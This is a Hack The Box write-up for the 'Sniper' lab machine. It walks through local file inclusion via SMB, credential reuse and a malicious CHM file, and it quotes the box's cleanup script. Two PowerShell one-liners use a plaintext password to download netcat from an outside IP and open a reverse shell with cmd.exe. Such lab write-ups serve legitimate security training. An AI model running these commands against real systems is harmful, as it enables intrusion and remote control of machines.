Sniper HTB Writeup

tl&dr

Port 80 was the port I attacked. On other ports I had no access. Found several directories by using gobuster, but on /blog directory there was a parameter including a .php file. And I suspected for lfi(local file inclusion).
I tried everything from PayloadAlltheThings.
I setup samba on my box and then I try to serve a file by using smb. At first I try a .php file which included a shell on it.
But nothing happend and the website throws a 404 page. I see the logs and see that the file was indeed accesed. I try to server a webshell this time, and It works.
Now I upload netcat and get a shell, on a writable folder I previously find by using dir /Q. At wwroot folder of the webserver I get some credentials.
I verify if these credentials work by using smbclient. I had to use the password with the user Chris. Now I need a way become that user.

powershell.exe -c "$user='Sniper\Chris'; $pass='36mEAhz/B8xQ~2VM'; try { Invoke-Command {cmd /c curl -o C:\Users\Chris\Desktop\nc64.exe 10.10.14.33/nc64.exe}  -ComputerName Sniper -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1

This will download nc to chris dektop folder. And then I get a reverse shell as chris.

powershell.exe -c "$user='Sniper\Chris'; $pass='36mEAhz/B8xQ~2VM'; try { Invoke-Command {cmd /c C:\Users\Chris\Desktop\nc64.exe 10.10.14.33 4444 -e cmd.exe}  -ComputerName Sniper -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1

Poking around the box I find a instructions.chm file located at Downloads folder. I get the file by copying it to my samba share, and then I install xchm to view that file.
The file tells me that a developer had enough with his boss and hopes someone will snipe his boss. Because this does not make much sense I try to find more info.
I find a folder located at C:\Docs which has a todo.txt inside of it. This time is the boss which yels at Chris about his php skills and then tells him to drop a file with the app documentation into that folder.
I use nishang script to create a malicious chm file.
To do this I had to switch to a Windows VM and then download HTML Help WorkShop.
The malicious script executes a reverse shell from Chris Desktop folder by using nc.exe. I had troubles with this part because I had to only include my instructions.chm and nothing else.
And then I get reverse shell as Administrator.

So there is something like cron running. I try to see for scheduled jobs but I can’t find the one which executes my malicious .chm file.
I enable rdp and after login by using rdp. I see that there was a file running which executed the malicious .chm.
But why I couldn’t Had more than 3 files there?(2 file which I had no permission to delete and then 1 file which I upload).

The Script was located at C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sig.ps1

And had the following content

1 while($true) {
2    get-process | where name -eq hh | Stop-Process -force
3    sleep 2
4    del C:\Docs\*.chm
5    sleep 20
6    Get-ChildItem "C:\Docs" -Filter *.chm | Foreach-Object {
7        $sig =  [char[]](gc $_.FullName -Encoding Byte -ReadCount 1 -TotalCount 2) -join ''
8        if($sig -eq 'IT') {
9                write "entre"
10                hh.exe $_.FullName
11        }
12        else {
13                write "boo"
14        }
15    }
16    sleep 10
17}

After running this script I can see that I was mistaken for having only my file at that folder. Because The script is running continuously I may had entered my file when code on line 3 was getting executed thus making me go nuts. So what this script
does..? At first this script stops every process which include the name hh then it waits 2 seconds and then deletes every file containing .chm at the end. Next It waits for 20 seconds and then It loops through every .chm file and checks if they are valid on line 7 by checking 2 byte from its header. If these bytes are equal to IT then hh.exe command is executed and
we get a shell. If not the script waits another 10 seconds and then executes again from line 2.

This box was great overall. It is also great to see how the creators are doing these boxes.


Read more:
Chm Virus,
Bypass Php Remote URL Inclusion restriction


Sniper HTB Writeup
http://3rg1s.com/2020/03/28/2020-01-31-Sniper/
Posted on
March 28, 2020
Licensed under